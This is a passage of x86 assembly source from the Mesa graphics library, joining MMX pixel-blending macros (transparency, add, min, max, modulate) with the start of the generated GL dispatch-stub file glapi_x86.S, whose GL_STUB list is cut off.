PADDW ( MP1, MA1 ) /* t1 + (t1 >> 8) ~= (t1/255) << 8 */ ;\
TWO(PADDW ( MP2, MA2 )) /* t2 + (t2 >> 8) ~= (t2/255) << 8 */ ;\
;\
PADDW ( MQ1, MA1 ) /* (t1/255 + q1) << 8 */ ;\
TWO(PADDW ( MQ2, MA2 )) /* (t2/255 + q2) << 8 */ ;\
;\
PSRLW ( CONST(8), MA1 ) /* sa1 | sb1 | sg1 | sr1 */ ;\
TWO(PSRLW ( CONST(8), MA2 )) /* sa2 | sb2 | sg2 | sr2 */
/* linear interpolation - geometric series with correction
*
* instead of the roundoff this adds a small correction to satisfy the OpenGL criteria
*
* t/255 ~= (t + (t >> 8) + (t >> 15)) >> 8
*
* note that although is faster than rounding off it doesn't give always the exact results
*/
/* GMB_LERP_GSC(MP1,MQ1,MA1, MP2,MQ2,MA2): lerp with a three-term
 * correction series (t + (t >> 8) + (t >> 15)) >> 8 -- faster than the
 * rounded GSR variant but not always bit-exact (see note above).
 * MAn must hold the broadcast alpha; MPn/MQn are clobbered as scratch;
 * the result ends up in MAn. */
#define GMB_LERP_GSC( MP1, MQ1, MA1, MP2, MQ2, MA2) \
PSUBW ( MQ1, MP1 ) /* pa1 - qa1 | pb1 - qb1 | pg1 - qg1 | pr1 - qr1 */ ;\
PSLLW ( CONST(8), MQ1 ) /* q1 << 8 */ ;\
PMULLW ( MP1, MA1 ) /* t1 = (p1 - q1)*a1 */ ;\
;\
TWO(PSUBW ( MQ2, MP2 )) /* pa2 - qa2 | pb2 - qb2 | pg2 - qg2 | pr2 - qr2 */ ;\
TWO(PSLLW ( CONST(8), MQ2 )) /* q2 << 8 */ ;\
TWO(PMULLW ( MP2, MA2 )) /* t2 = (p2 - q2)*a2 */ ;\
;\
MOVQ ( MA1, MP1 ) ;\
PSRLW ( CONST(8), MA1 ) /* t1 >> 8 */ ;\
;\
TWO(MOVQ ( MA2, MP2 )) ;\
TWO(PSRLW ( CONST(8), MA2 )) /* t2 >> 8 */ ;\
;\
PADDW ( MA1, MP1 ) /* t1 + (t1 >> 8) ~= (t1/255) << 8 */ ;\
PSRLW ( CONST(7), MA1 ) /* t1 >> 15 */ ;\
;\
TWO(PADDW ( MA2, MP2 )) /* t2 + (t2 >> 8) ~= (t2/255) << 8 */ ;\
TWO(PSRLW ( CONST(7), MA2 )) /* t2 >> 15 */ ;\
;\
PADDW ( MP1, MA1 ) /* t1 + (t1 >> 8) + (t1 >>15) ~= (t1/255) << 8 */ ;\
TWO(PADDW ( MP2, MA2 )) /* t2 + (t2 >> 8) + (t2 >>15) ~= (t2/255) << 8 */ ;\
;\
PADDW ( MQ1, MA1 ) /* (t1/255 + q1) << 8 */ ;\
TWO(PADDW ( MQ2, MA2 )) /* (t2/255 + q2) << 8 */ ;\
;\
PSRLW ( CONST(8), MA1 ) /* sa1 | sb1 | sg1 | sr1 */ ;\
TWO(PSRLW ( CONST(8), MA2 )) /* sa2 | sb2 | sg2 | sr2 */
/* common blending setup code
*
* note that M00 is a register with 0x0000000000000000 constant which can be easily obtained making
*
* PXOR ( M00, M00 )
*/
/* GMB_LOAD( rgba, dest, MPP, MQQ )
 *
 * Fetch the pixel data to blend: MPP receives the data at [rgba] and
 * MQQ the data at [dest].  On the one-pixel tail path (ONE) a single
 * 32-bit pixel is loaded with MOVD; on the main two-pixel path (TWO)
 * a 64-bit pixel pair is loaded with MOVQ.
 */
#define GMB_LOAD(rgba, dest, MPP, MQQ) \
ONE(MOVD ( REGIND(rgba), MPP )) /* | | | | qa1 | qb1 | qg1 | qr1 */ ;\
ONE(MOVD ( REGIND(dest), MQQ )) /* | | | | pa1 | pb1 | pg1 | pr1 */ ;\
;\
TWO(MOVQ ( REGIND(rgba), MPP )) /* qa2 | qb2 | qg2 | qr2 | qa1 | qb1 | qg1 | qr1 */ ;\
TWO(MOVQ ( REGIND(dest), MQQ )) /* pa2 | pb2 | pg2 | pr2 | pa1 | pb1 | pg1 | pr1 */
/* GMB_UNPACK( MP1, MQ1, MP2, MQ2, M00 )
 *
 * Widen the packed 8-bit components to 16-bit words by interleaving
 * with the zero register M00.  The low halves of MP1/MQ1 are unpacked
 * in place; on the two-pixel path the originals are first copied to
 * MP2/MQ2 and their high halves unpacked there.
 */
#define GMB_UNPACK(MP1, MQ1, MP2, MQ2, M00) \
TWO(MOVQ ( MP1, MP2 )) ;\
TWO(MOVQ ( MQ1, MQ2 )) ;\
;\
PUNPCKLBW ( M00, MQ1 ) /* qa1 | qb1 | qg1 | qr1 */ ;\
TWO(PUNPCKHBW ( M00, MQ2 )) /* qa2 | qb2 | qg2 | qr2 */ ;\
PUNPCKLBW ( M00, MP1 ) /* pa1 | pb1 | pg1 | pr1 */ ;\
TWO(PUNPCKHBW ( M00, MP2 )) /* pa2 | pb2 | pg2 | pr2 */
/* GMB_ALPHA( MP1, MA1, MP2, MA2 )
 *
 * Broadcast the alpha word (highest 16-bit lane) of each unpacked
 * pixel across all four lanes of MA1 (and MA2 on the two-pixel path),
 * producing the per-component multiplier used by the blend macros.
 */
#define GMB_ALPHA(MP1, MA1, MP2, MA2) \
MOVQ ( MP1, MA1 ) ;\
TWO(MOVQ ( MP2, MA2 )) ;\
;\
PUNPCKHWD ( MA1, MA1 ) /* pa1 | pa1 | | */ ;\
TWO(PUNPCKHWD ( MA2, MA2 )) /* pa2 | pa2 | | */ ;\
PUNPCKHDQ ( MA1, MA1 ) /* pa1 | pa1 | pa1 | pa1 */ ;\
TWO(PUNPCKHDQ ( MA2, MA2 )) /* pa2 | pa2 | pa2 | pa2 */
/* GMB_PACK( MS1, MS2 )
 *
 * Re-pack the two pixels' 16-bit component words into 8-bit bytes with
 * unsigned saturation; MS1 receives the packed result.
 *
 * FIX: the body previously ended with ";\".  Backslash-newline splicing
 * happens before preprocessor directives are recognized, so that
 * trailing continuation pulled the following "#define GMB_STORE" line
 * into this macro's replacement list and GMB_STORE was never defined.
 * The stray continuation is removed here.
 */
#define GMB_PACK( MS1, MS2 ) \
PACKUSWB ( MS2, MS1 ) /* sa2 | sb2 | sg2 | sr2 | sa1 | sb1 | sg1 | sr1 */
/* GMB_STORE( rgba, MSS )
 *
 * Write the packed blend result in MSS back to [rgba]: 32 bits (one
 * pixel, MOVD) on the ONE path, 64 bits (two pixels, MOVQ) on the
 * TWO path.
 */
#define GMB_STORE(rgba, MSS ) \
ONE(MOVD ( MSS, REGIND(rgba) )) /* | | | | sa1 | sb1 | sg1 | sr1 */ ;\
TWO(MOVQ ( MSS, REGIND(rgba) )) /* sa2 | sb2 | sg2 | sr2 | sa1 | sb1 | sg1 | sr1 */
/* Kevin F. Quinn <kevquinn@gentoo.org> 2 July 2006
* Replace data segment constants with text-segment
* constants (via pushl/movq)
SEG_DATA
ALIGNDATA8
const_0080:
D_LONG 0x00800080, 0x00800080
const_80:
D_LONG 0x80808080, 0x80808080
*/
/* 32-bit halves of the two 64-bit constants shown in the comment
 * above.  The INIT macros below push a pair of these onto the stack
 * and load MM7 from [ESP] with MOVQ:
 *   const_0080_*: 0x0080 in each 16-bit lane (used by the _modulate
 *                 INIT / GMB_MULT_GSR path)
 *   const_80_*:   0x80 in each byte (sign-flip value; see the
 *                 "unsigned -> signed" PXORs in the _min/_max MAINs)
 */
#define const_0080_l 0x00800080
#define const_0080_h 0x00800080
#define const_80_l 0x80808080
#define const_80_h 0x80808080
SEG_TEXT
/* Blend transparency function
*/
/* Template parameters for the included mmx_blendtmp.h: this
 * instantiation produces the *_transparency (alpha blend) variant.
 */
#define TAG(x) CONCAT(x,_transparency)
#define LLTAG(x) LLBL2(x,_transparency)
/* INIT: MM0 := 0 once; MM0 is the zero register consumed by GMB_UNPACK. */
#define INIT \
PXOR ( MM0, MM0 ) /* 0x0000 | 0x0000 | 0x0000 | 0x0000 */
/* MAIN, per iteration (one pixel via ONE, two via TWO): load source
 * and destination, unpack bytes to words, broadcast source alpha,
 * interpolate with GMB_LERP_GSC, pack with saturation and store the
 * result back to [rgba].
 */
#define MAIN( rgba, dest ) \
GMB_LOAD( rgba, dest, MM1, MM2 ) ;\
GMB_UNPACK( MM1, MM2, MM4, MM5, MM0 ) ;\
GMB_ALPHA( MM1, MM3, MM4, MM6 ) ;\
GMB_LERP_GSC( MM1, MM2, MM3, MM4, MM5, MM6 ) ;\
GMB_PACK( MM3, MM6 ) ;\
GMB_STORE( rgba, MM3 )
#include "mmx_blendtmp.h"
/* Blend add function
*
* FIXME: Add some loop unrolling here...
*/
/* Template parameters for the *_add blend: per-byte unsigned
 * saturating add of the two pixels (PADDUSB), result written back to
 * [rgba].  The pixels stay packed throughout, so INIT needs no setup.
 */
#define TAG(x) CONCAT(x,_add)
#define LLTAG(x) LLBL2(x,_add)
#define INIT
#define MAIN( rgba, dest ) \
ONE(MOVD ( REGIND(rgba), MM1 )) /* | | | | qa1 | qb1 | qg1 | qr1 */ ;\
ONE(MOVD ( REGIND(dest), MM2 )) /* | | | | pa1 | pb1 | pg1 | pr1 */ ;\
ONE(PADDUSB ( MM2, MM1 )) ;\
ONE(MOVD ( MM1, REGIND(rgba) )) /* | | | | sa1 | sb1 | sg1 | sr1 */ ;\
;\
TWO(MOVQ ( REGIND(rgba), MM1 )) /* qa2 | qb2 | qg2 | qr2 | qa1 | qb1 | qg1 | qr1 */ ;\
TWO(PADDUSB ( REGIND(dest), MM1 )) /* sa2 | sb2 | sg2 | sr2 | sa1 | sb1 | sg1 | sr1 */ ;\
TWO(MOVQ ( MM1, REGIND(rgba) ))
#include "mmx_blendtmp.h"
/* Blend min function
*/
/* Template parameters for the *_min blend: per-byte minimum of the two
 * pixels.  PCMPGTB only performs signed compares, so both inputs are
 * first XORed with 0x80 per byte (MM7) to map the unsigned compare
 * onto a signed one; the resulting mask then selects one byte from
 * each input (see per-line comments).
 */
#define TAG(x) CONCAT(x,_min)
#define LLTAG(x) LLBL2(x,_min)
/* Kevin F. Quinn 2nd July 2006
 * Replace data segment constants with text-segment instructions
#define INIT \
MOVQ ( CONTENT(const_80), MM7 )
 */
/* INIT: materialize the 64-bit 0x8080...80 constant in MM7 by pushing
 * its two 32-bit halves (high first, so the low half lands at [ESP])
 * and loading with MOVQ, then restoring ESP.
 */
#define INIT \
PUSH_L ( CONST(const_80_h) ) /* 0x80| 0x80| 0x80| 0x80| 0x80| 0x80| 0x80| 0x80*/ ;\
PUSH_L ( CONST(const_80_l) ) ;\
MOVQ ( REGIND(ESP), MM7 ) ;\
ADD_L ( CONST(8), ESP)
/* MAIN: compare sign-flipped copies, then mask/merge to keep the
 * smaller byte of each pair; result stored back to [rgba].
 */
#define MAIN( rgba, dest ) \
GMB_LOAD( rgba, dest, MM1, MM2 ) ;\
MOVQ ( MM1, MM3 ) ;\
MOVQ ( MM2, MM4 ) ;\
PXOR ( MM7, MM3 ) /* unsigned -> signed */ ;\
PXOR ( MM7, MM4 ) /* unsigned -> signed */ ;\
PCMPGTB ( MM3, MM4 ) /* q > p ? 0xff : 0x00 */ ;\
PAND ( MM4, MM1 ) /* q > p ? p : 0 */ ;\
PANDN ( MM2, MM4 ) /* q > p ? 0 : q */ ;\
POR ( MM1, MM4 ) /* q > p ? p : q */ ;\
GMB_STORE( rgba, MM4 )
#include "mmx_blendtmp.h"
/* Blend max function
*/
/* Template parameters for the *_max blend: per-byte maximum of the two
 * pixels, using the same 0x80 sign-flip compare trick as *_min above.
 */
#define TAG(x) CONCAT(x,_max)
#define LLTAG(x) LLBL2(x,_max)
/* Kevin F. Quinn 2nd July 2006
 * Replace data segment constants with text-segment instructions
#define INIT \
MOVQ ( CONTENT(const_80), MM7 )
 */
/* INIT: materialize the 64-bit 0x8080...80 constant in MM7 via the
 * stack, exactly as in the *_min INIT above.
 *
 * FIX: the halves were previously pushed low-first, which places the
 * high dword at [ESP] and so loads the two halves of MM7 swapped
 * (x86 is little endian: the value at the lower address becomes the
 * low dword).  It happened to be harmless only because const_80_l and
 * const_80_h are both 0x80808080; push high-first to match *_min and
 * the intended layout, removing the latent bug should the halves ever
 * differ.
 */
#define INIT \
PUSH_L ( CONST(const_80_h) ) /* 0x80| 0x80| 0x80| 0x80| 0x80| 0x80| 0x80| 0x80*/ ;\
PUSH_L ( CONST(const_80_l) ) ;\
MOVQ ( REGIND(ESP), MM7 ) ;\
ADD_L ( CONST(8), ESP)
/* MAIN: same sign-flipped PCMPGTB compare as the *_min MAIN, but the
 * mask/merge keeps the other operand of each pair (the larger byte);
 * result stored back to [rgba].
 */
#define MAIN( rgba, dest ) \
GMB_LOAD( rgba, dest, MM1, MM2 ) ;\
MOVQ ( MM1, MM3 ) ;\
MOVQ ( MM2, MM4 ) ;\
PXOR ( MM7, MM3 ) /* unsigned -> signed */ ;\
PXOR ( MM7, MM4 ) /* unsigned -> signed */ ;\
PCMPGTB ( MM3, MM4 ) /* q > p ? 0xff : 0x00 */ ;\
PAND ( MM4, MM2 ) /* q > p ? q : 0 */ ;\
PANDN ( MM1, MM4 ) /* q > p ? 0 : p */ ;\
POR ( MM2, MM4 ) /* q > p ? p : q */ ;\
GMB_STORE( rgba, MM4 )
#include "mmx_blendtmp.h"
/* Blend modulate function
*/
/* Template parameters for the *_modulate blend (per-component
 * multiply via GMB_MULT_GSR; see MAIN below).
 */
#define TAG(x) CONCAT(x,_modulate)
#define LLTAG(x) LLBL2(x,_modulate)
/* Kevin F. Quinn 2nd July 2006
 * Replace data segment constants with text-segment instructions
#define INIT \
MOVQ ( CONTENT(const_0080), MM7 )
 */
/* INIT: clear MM0 (zero register for GMB_UNPACK) and materialize the
 * 0x0080-per-lane constant in MM7 via the stack.
 *
 * FIX: the halves were previously pushed low-first, which places the
 * high dword at [ESP] and loads MM7's halves swapped (little endian).
 * Harmless only because const_0080_l == const_0080_h; push high-first
 * so the layout matches the intended 64-bit constant, as in the
 * *_min INIT.
 */
#define INIT \
PXOR ( MM0, MM0 ) /* 0x0000 | 0x0000 | 0x0000 | 0x0000 */ ;\
PUSH_L ( CONST(const_0080_h) ) /* 0x0080 | 0x0080 | 0x0080 | 0x0080 */ ;\
PUSH_L ( CONST(const_0080_l) ) ;\
MOVQ ( REGIND(ESP), MM7 ) ;\
ADD_L ( CONST(8), ESP)
/* MAIN: load both pixels, unpack to 16-bit words, multiply
 * per-component with GMB_MULT_GSR (scaled multiply using the 0x0080
 * bias in MM7; defined earlier in this file), pack with saturation
 * and store back to [rgba].
 */
#define MAIN( rgba, dest ) \
GMB_LOAD( rgba, dest, MM1, MM2 ) ;\
GMB_UNPACK( MM1, MM2, MM4, MM5, MM0 ) ;\
GMB_MULT_GSR( MM1, MM2, MM4, MM5, MM7 ) ;\
GMB_PACK( MM2, MM5 ) ;\
GMB_STORE( rgba, MM2 )
#include "mmx_blendtmp.h"
#endif
#if defined (__ELF__) && defined (__linux__)
.section .note.GNU-stack,"",%progbits
#endif
/*
 * Non-assembly residue from file concatenation (original text
 * preserved below, commented out so it cannot break assembly):
 * |
 * AIFM-sys/AIFM
 * | 96,743
 * |
 * shenango/apps/parsec/pkgs/libs/mesa/src/src/mesa/x86/glapi_x86.S
 * |
 */
/* DO NOT EDIT - This file generated automatically by gl_x86_asm.py (from Mesa) script */
/*
* Copyright (C) 1999-2001 Brian Paul All Rights Reserved.
* (C) Copyright IBM Corporation 2004, 2005
* All Rights Reserved.
*
* Permission is hereby granted, free of charge, to any person obtaining a
* copy of this software and associated documentation files (the "Software"),
* to deal in the Software without restriction, including without limitation
* the rights to use, copy, modify, merge, publish, distribute, sub license,
* and/or sell copies of the Software, and to permit persons to whom the
* Software is furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice (including the next
* paragraph) shall be included in all copies or substantial portions of the
* Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NON-INFRINGEMENT. IN NO EVENT SHALL
* BRIAN PAUL, IBM,
* AND/OR THEIR SUPPLIERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
* WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF
* OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
* SOFTWARE.
*/
#include "assyntax.h"
#include "glapioffsets.h"
/* GL_PREFIX(n, n2): map a GL entry-point name to its public symbol.
 * stdcall builds use the decorated form (second argument, e.g.
 * Foo@8); otherwise the plain name.  With USE_MGL_NAMESPACE the
 * exported prefix is "mgl" instead of "gl", and the dispatch-table
 * symbol is renamed to match.
 */
#if defined(STDCALL_API)
# if defined(USE_MGL_NAMESPACE)
# define GL_PREFIX(n,n2) GLNAME(CONCAT(mgl,n2))
# else
# define GL_PREFIX(n,n2) GLNAME(CONCAT(gl,n2))
# endif
#else
# if defined(USE_MGL_NAMESPACE)
# define GL_PREFIX(n,n2) GLNAME(CONCAT(mgl,n))
# define _glapi_Dispatch _mglapi_Dispatch
# else
# define GL_PREFIX(n,n2) GLNAME(CONCAT(gl,n))
# endif
#endif
/* GL_OFFSET(x): memory operand addressing slot x of the dispatch
 * table whose base is in EAX (4 bytes per function pointer).
 */
#define GL_OFFSET(x) CODEPTR(REGOFF(4 * x, EAX))
/* GLOBL_FN(x): export a stub symbol; add a ".type x, function"
 * annotation on assemblers that support it.
 */
#if defined(GNU_ASSEMBLER) && !defined(__DJGPP__) && !defined(__MINGW32__)
#define GLOBL_FN(x) GLOBL x ; .type x, function
#else
#define GLOBL_FN(x) GLOBL x
#endif
/* THREADS: set if any supported threading package is enabled. */
#if defined(PTHREADS) || defined(USE_XTHREADS) || defined(SOLARIS_THREADS) || defined(WIN32_THREADS) || defined(BEOS_THREADS)
# define THREADS
#endif
#ifdef GLX_USE_TLS
#ifdef GLX_X86_READONLY_TEXT
/* EAX holds the value returned by _x86_get_dispatch; dereference it
 * %gs-relative to reach this thread's dispatch table. */
# define CTX_INSNS MOV_L(GS:(EAX), EAX)
#else
/* NOTE(review): the NOP appears to be patch space rewritten at
 * runtime by init_glapi_relocs() (per the original comment). */
# define CTX_INSNS NOP /* Pad for init_glapi_relocs() */
#endif
/* GL_STUB(fn, off, fn_alt): emit the public entry point for one GL
 * function.  TLS variant: fetch the dispatch pointer via
 * _x86_get_dispatch, then tail-jump through table slot `off`. */
# define GL_STUB(fn,off,fn_alt) \
ALIGNTEXT16; \
GLOBL_FN(GL_PREFIX(fn, fn_alt)); \
GL_PREFIX(fn, fn_alt): \
CALL(_x86_get_dispatch) ; \
CTX_INSNS ; \
JMP(GL_OFFSET(off))
/* pthreads variant: fast path jumps through the cached global
 * _glapi_Dispatch pointer; when it is NULL, fall back to
 * _x86_get_dispatch (pthread_getspecific) for the per-thread table. */
#elif defined(PTHREADS)
# define GL_STUB(fn,off,fn_alt) \
ALIGNTEXT16; \
GLOBL_FN(GL_PREFIX(fn, fn_alt)); \
GL_PREFIX(fn, fn_alt): \
MOV_L(CONTENT(GLNAME(_glapi_Dispatch)), EAX) ; \
TEST_L(EAX, EAX) ; \
JE(1f) ; \
JMP(GL_OFFSET(off)) ; \
1: CALL(_x86_get_dispatch) ; \
JMP(GL_OFFSET(off))
/* generic threaded variant: NULL fallback calls the C helper
 * _glapi_get_dispatch instead. */
#elif defined(THREADS)
# define GL_STUB(fn,off,fn_alt) \
ALIGNTEXT16; \
GLOBL_FN(GL_PREFIX(fn, fn_alt)); \
GL_PREFIX(fn, fn_alt): \
MOV_L(CONTENT(GLNAME(_glapi_Dispatch)), EAX) ; \
TEST_L(EAX, EAX) ; \
JE(1f) ; \
JMP(GL_OFFSET(off)) ; \
1: CALL(_glapi_get_dispatch) ; \
JMP(GL_OFFSET(off))
#else /* Non-threaded version. */
/* single-threaded: the global pointer is always valid. */
# define GL_STUB(fn,off,fn_alt) \
ALIGNTEXT16; \
GLOBL_FN(GL_PREFIX(fn, fn_alt)); \
GL_PREFIX(fn, fn_alt): \
MOV_L(CONTENT(GLNAME(_glapi_Dispatch)), EAX) ; \
JMP(GL_OFFSET(off))
#endif
/* GL_STUB_ALIAS(fn, off, fn_alt, alias, alias_alt): make `fn` an
 * assembler-level alias of the already-emitted `alias` stub when the
 * toolchain supports .set; otherwise emit a full independent stub.
 */
#ifdef HAVE_ALIAS
# define GL_STUB_ALIAS(fn,off,fn_alt,alias,alias_alt) \
.globl GL_PREFIX(fn, fn_alt) ; \
.set GL_PREFIX(fn, fn_alt), GL_PREFIX(alias, alias_alt)
#else
# define GL_STUB_ALIAS(fn,off,fn_alt,alias,alias_alt) \
GL_STUB(fn, off, fn_alt)
#endif
SEG_TEXT
#ifdef GLX_USE_TLS
/* _x86_get_dispatch (TLS flavour): compute the GOT base from the
 * current EIP (call/pop idiom) and load the @GOTNTPOFF value for
 * _glapi_tls_Dispatch into EAX.  NOTE(review): the stubs then apply
 * CTX_INSNS (a %gs-relative load) to EAX, so this returns a
 * %gs-relative TLS offset rather than a linear address — confirm
 * against init_glapi_relocs().
 */
GLOBL GLNAME(_x86_get_dispatch)
HIDDEN(GLNAME(_x86_get_dispatch))
ALIGNTEXT16
GLNAME(_x86_get_dispatch):
call 1f /* push EIP of label 1 */
1: popl %eax /* EAX = address of label 1 */
addl $_GLOBAL_OFFSET_TABLE_+[.-1b], %eax /* EAX = GOT base */
movl _glapi_tls_Dispatch@GOTNTPOFF(%eax), %eax
ret
#elif defined(PTHREADS)
/* _x86_get_dispatch (pthreads flavour): return in EAX the result of
 * pthread_getspecific(_gl_DispatchTSD).  The SUB reserves scratch
 * space; the ADD pops it together with the pushed key argument
 * (24 + 4 = 28 bytes), leaving ESP balanced.
 */
EXTERN GLNAME(_glapi_Dispatch)
EXTERN GLNAME(_gl_DispatchTSD)
EXTERN GLNAME(pthread_getspecific)
ALIGNTEXT16
GLNAME(_x86_get_dispatch):
SUB_L(CONST(24), ESP)
PUSH_L(GLNAME(_gl_DispatchTSD))
CALL(GLNAME(pthread_getspecific))
ADD_L(CONST(28), ESP)
RET
#elif defined(THREADS)
/* generic threaded builds resolve the table via the C helper. */
EXTERN GLNAME(_glapi_get_dispatch)
#endif
/* Non-readonly-text TLS builds place the (runtime-patched) stubs in a
 * writable+executable section. */
#if defined( GLX_USE_TLS ) && !defined( GLX_X86_READONLY_TEXT )
.section wtext, "awx", @progbits
#endif /* defined( GLX_USE_TLS ) */
ALIGNTEXT16
GLOBL GLNAME(gl_dispatch_functions_start)
HIDDEN(GLNAME(gl_dispatch_functions_start))
GLNAME(gl_dispatch_functions_start):
GL_STUB(NewList, _gloffset_NewList, NewList@8)
GL_STUB(EndList, _gloffset_EndList, EndList@0)
GL_STUB(CallList, _gloffset_CallList, CallList@4)
GL_STUB(CallLists, _gloffset_CallLists, CallLists@12)
GL_STUB(DeleteLists, _gloffset_DeleteLists, DeleteLists@8)
GL_STUB(GenLists, _gloffset_GenLists, GenLists@4)
GL_STUB(ListBase, _gloffset_ListBase, ListBase@4)
GL_STUB(Begin, _gloffset_Begin, Begin@4)
GL_STUB(Bitmap, _gloffset_Bitmap, Bitmap@28)
GL_STUB(Color3b, _gloffset_Color3b, Color3b@12)
GL_STUB(Color3bv, _gloffset_Color3bv, Color3bv@4)
GL_STUB(Color3d, _gloffset_Color3d, Color3d@24)
GL_STUB(Color3dv, _gloffset_Color3dv, Color3dv@4)
GL_STUB(Color3f, _gloffset_Color3f, Color3f@12)
GL_STUB(Color3fv, _gloffset_Color3fv, Color3fv@4)
GL_STUB(Color3i, _gloffset_Color3i, Color3i@12)
GL_STUB(Color3iv, _gloffset_Color3iv, Color3iv@4)
GL_STUB(Color3s, _gloffset_Color3s, Color3s@12)
GL_STUB(Color3sv, _gloffset_Color3sv, Color3sv@4)
GL_STUB(Color3ub, _gloffset_Color3ub, Color3ub@12)
GL_STUB(Color3ubv, _gloffset_Color3ubv, Color3ubv@4)
GL_STUB(Color3ui, _gloffset_Color3ui, Color3ui@12)
GL_STUB(Color3uiv, _gloffset_Color3uiv, Color3uiv@4)
GL_STUB(Color3us, _gloffset_Color3us, Color3us@12)
GL_STUB(Color3usv, _gloffset_Color3usv, Color3usv@4)
GL_STUB(Color4b, _gloffset_Color4b, Color4b@16)
GL_STUB(Color4bv, _gloffset_Color4bv, Color4bv@4)
GL_STUB(Color4d, _gloffset_Color4d, Color4d@32)
GL_STUB(Color4dv, _gloffset_Color4dv, Color4dv@4)
GL_STUB(Color4f, _gloffset_Color4f, Color4f@16)
GL_STUB(Color4fv, _gloffset_Color4fv, Color4fv@4)
GL_STUB(Color4i, _gloffset_Color4i, Color4i@16)
GL_STUB(Color4iv, _gloffset_Color4iv, Color4iv@4)
GL_STUB(Color4s, _gloffset_Color4s, Color4s@16)
GL_STUB(Color4sv, _gloffset_Color4sv, Color4sv@4)
GL_STUB(Color4ub, _gloffset_Color4ub, Color4ub@16)
GL_STUB(Color4ubv, _gloffset_Color4ubv, Color4ubv@4)
GL_STUB(Color4ui, _gloffset_Color4ui, Color4ui@16)
GL_STUB(Color4uiv, _gloffset_Color4uiv, Color4uiv@4)
GL_STUB(Color4us, _gloffset_Color4us, Color4us@16)
GL_STUB(Color4usv, _gloffset_Color4usv, Color4usv@4)
GL_STUB(EdgeFlag, _gloffset_EdgeFlag, EdgeFlag@4)
GL_STUB(EdgeFlagv, _gloffset_EdgeFlagv, EdgeFlagv@4)
GL_STUB(End, _gloffset_End, End@0)
GL_STUB(Indexd, _gloffset_Indexd, Indexd@8)
GL_STUB(Indexdv, _gloffset_Indexdv, Indexdv@4)
GL_STUB(Indexf, _gloffset_Indexf, Indexf@4)
GL_STUB(Indexfv, _gloffset_Indexfv, Indexfv@4)
GL_STUB(Indexi, _gloffset_Indexi, Indexi@4)
GL_STUB(Indexiv, _gloffset_Indexiv, Indexiv@4)
GL_STUB(Indexs, _gloffset_Indexs, Indexs@4)
GL_STUB(Indexsv, _gloffset_Indexsv, Indexsv@4)
GL_STUB(Normal3b, _gloffset_Normal3b, Normal3b@12)
GL_STUB(Normal3bv, _gloffset_Normal3bv, Normal3bv@4)
GL_STUB(Normal3d, _gloffset_Normal3d, Normal3d@24)
GL_STUB(Normal3dv, _gloffset_Normal3dv, Normal3dv@4)
GL_STUB(Normal3f, _gloffset_Normal3f, Normal3f@12)
GL_STUB(Normal3fv, _gloffset_Normal3fv, Normal3fv@4)
GL_STUB(Normal3i, _gloffset_Normal3i, Normal3i@12)
GL_STUB(Normal3iv, _gloffset_Normal3iv, Normal3iv@4)
GL_STUB(Normal3s, _gloffset_Normal3s, Normal3s@12)
GL_STUB(Normal3sv, _gloffset_Normal3sv, Normal3sv@4)
GL_STUB(RasterPos2d, _gloffset_RasterPos2d, RasterPos2d@16)
GL_STUB(RasterPos2dv, _gloffset_RasterPos2dv, RasterPos2dv@4)
GL_STUB(RasterPos2f, _gloffset_RasterPos2f, RasterPos2f@8)
GL_STUB(RasterPos2fv, _gloffset_RasterPos2fv, RasterPos2fv@4)
GL_STUB(RasterPos2i, _gloffset_RasterPos2i, RasterPos2i@8)
GL_STUB(RasterPos2iv, _gloffset_RasterPos2iv, RasterPos2iv@4)
GL_STUB(RasterPos2s, _gloffset_RasterPos2s, RasterPos2s@8)
GL_STUB(RasterPos2sv, _gloffset_RasterPos2sv, RasterPos2sv@4)
GL_STUB(RasterPos3d, _gloffset_RasterPos3d, RasterPos3d@24)
GL_STUB(RasterPos3dv, _gloffset_RasterPos3dv, RasterPos3dv@4)
GL_STUB(RasterPos3f, _gloffset_RasterPos3f, RasterPos3f@12)
GL_STUB(RasterPos3fv, _gloffset_RasterPos3fv, RasterPos3fv@4)
GL_STUB(RasterPos3i, _gloffset_RasterPos3i, RasterPos3i@12)
GL_STUB(RasterPos3iv, _gloffset_RasterPos3iv, RasterPos3iv@4)
GL_STUB(RasterPos3s, _gloffset_RasterPos3s, RasterPos3s@12)
GL_STUB(RasterPos3sv, _gloffset_RasterPos3sv, RasterPos3sv@4)
GL_STUB(RasterPos4d, _gloffset_RasterPos4d, RasterPos4d@32)
GL_STUB(RasterPos4dv, _gloffset_RasterPos4dv, RasterPos4dv@4)
GL_STUB(RasterPos4f, _gloffset_RasterPos4f, RasterPos4f@16)
GL_STUB(RasterPos4fv, _gloffset_RasterPos4fv, RasterPos4fv@4)
GL_STUB(RasterPos4i, _gloffset_RasterPos4i, RasterPos4i@16)
GL_STUB(RasterPos4iv, _gloffset_RasterPos4iv, RasterPos4iv@4)
GL_STUB(RasterPos4s, _gloffset_RasterPos4s, RasterPos4s@16)
GL_STUB(RasterPos4sv, _gloffset_RasterPos4sv, RasterPos4sv@4)
GL_STUB(Rectd, _gloffset_Rectd, Rectd@32)
GL_STUB(Rectdv, _gloffset_Rectdv, Rectdv@8)
GL_STUB(Rectf, _gloffset_Rectf, Rectf@16)
GL_STUB(Rectfv, _gloffset_Rectfv, Rectfv@8)
GL_STUB(Recti, _gloffset_Recti, Recti@16)
GL_STUB(Rectiv, _gloffset_Rectiv, Rectiv@8)
GL_STUB(Rects, _gloffset_Rects, Rects@16)
GL_STUB(Rectsv, _gloffset_Rectsv, Rectsv@8)
GL_STUB(TexCoord1d, _gloffset_TexCoord1d, TexCoord1d@8)
GL_STUB(TexCoord1dv, _gloffset_TexCoord1dv, TexCoord1dv@4)
GL_STUB(TexCoord1f, _gloffset_TexCoord1f, TexCoord1f@4)
GL_STUB(TexCoord1fv, _gloffset_TexCoord1fv, TexCoord1fv@4)
GL_STUB(TexCoord1i, _gloffset_TexCoord1i, TexCoord1i@4)
GL_STUB(TexCoord1iv, _gloffset_TexCoord1iv, TexCoord1iv@4)
